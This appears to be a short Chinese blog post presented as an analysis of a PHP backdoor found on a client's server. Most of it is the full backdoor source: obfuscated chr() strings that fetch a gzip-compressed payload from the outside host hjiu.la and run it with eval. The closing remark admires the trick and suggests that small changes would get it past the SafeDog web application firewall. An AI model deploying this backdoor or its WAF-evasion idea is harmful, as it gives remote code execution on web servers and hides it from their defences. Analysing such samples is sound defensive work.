一个PHP后门的分析过程

<?php
$password='123';
//----------功能程序------------------//
$c="chr";//字符串
session_start();

if(empty($_SESSION['PhpCode'])){
$url.=$c(104).$c(116).$c(116).$c(112).$c(58);
$url.=$c(47).$c(47).$c(104).$c(106).$c(105);
$url.=$c(117).$c(46).$c(108).$c(97).$c(47);
$url.=$c(115).$c(99).$c(120).$c(112).$c(46);
$url.=$c(103).$c(105).$c(102);

//$url = chr(104)chr(116)chr(116)chr(112)chr(58)chr(47)chr(47)chr(104)chr(106)chr(105)chr(117)chr(46)chr(108)chr(97)chr(47)chr(115)chr(99)chr(120)chr(112)chr(46)chr(103)chr(105)chr(102)

//$url = http://hjiu.la/scxp.gif

$get=chr(102).chr(105).chr(108).chr(101).chr(95);
$get.=chr(103).chr(101).chr(116).chr(95).chr(99);
$get.=chr(111).chr(110).chr(116).chr(101).chr(110);
$get.=chr(116).chr(115);

//$get = chr(102)chr(105)chr(108)chr(101)chr(95)chr(103)chr(101)chr(116)chr(95)chr(99)chr(111)chr(110)chr(116)chr(101)chr(110)chr(116)chr(115)

//$get = file_get_contents

echo  $get($url);

$_SESSION['PhpCode']=$get($url);
}

//echo $url;

$unzip=$c(103).$c(122).$c(105).$c(110);
$unzip.=$c(102).$c(108).$c(97).$c(116).$c(101);
//echo $unzip;//die;

//chr(103).chr(122).chr(105).chr(110)chr(102).chr(108).chr(97).chr(116).chr(101)

//$unzip = gzinflate 解码处理
@eval($unzip($_SESSION['PhpCode']));

?>

今晚帮客户分析一个后门程序,分析过程如上,试了下过不了狗,eval直接写肯定就过不了狗,估计改改可以绕过安全狗,真是一个完美的思路,调用远程加密的后门代码绕过WAF。

发表评论

电子邮件地址不会被公开。 必填项已用*标注